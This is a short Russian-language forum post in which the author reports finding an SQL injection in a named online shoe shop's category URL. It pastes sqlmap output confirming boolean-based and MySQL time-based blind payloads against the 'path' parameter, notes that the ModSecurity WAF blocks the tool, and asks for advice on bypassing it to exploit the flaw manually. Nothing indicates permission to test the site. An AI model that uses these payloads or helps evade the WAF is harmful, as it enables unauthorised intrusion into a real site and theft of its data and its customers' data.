Всем доброго времени суток, нашел SQLi, но при попытке раскрутки упираюсь в ваф Mod_security. Sqlmap при попытке атаки целевого url http://shoebrand.co.uk/index.php?rou...th=64&limit=32 с использованием тампера between возвращает ошибку:

[WARNING] HTTP error codes detected during run:

403 (Forbidden) - 1 times.

Найденные уязвимости:

Parameter: path (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: route=product/category&path=64 AND 9469=9469&limit=32

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind

Payload: route=product/category&path=64 AND SLEEP(10)&limit=32

Может кто-нибудь помочь советом, в какую сторону нужно копать для раскрутки вручную?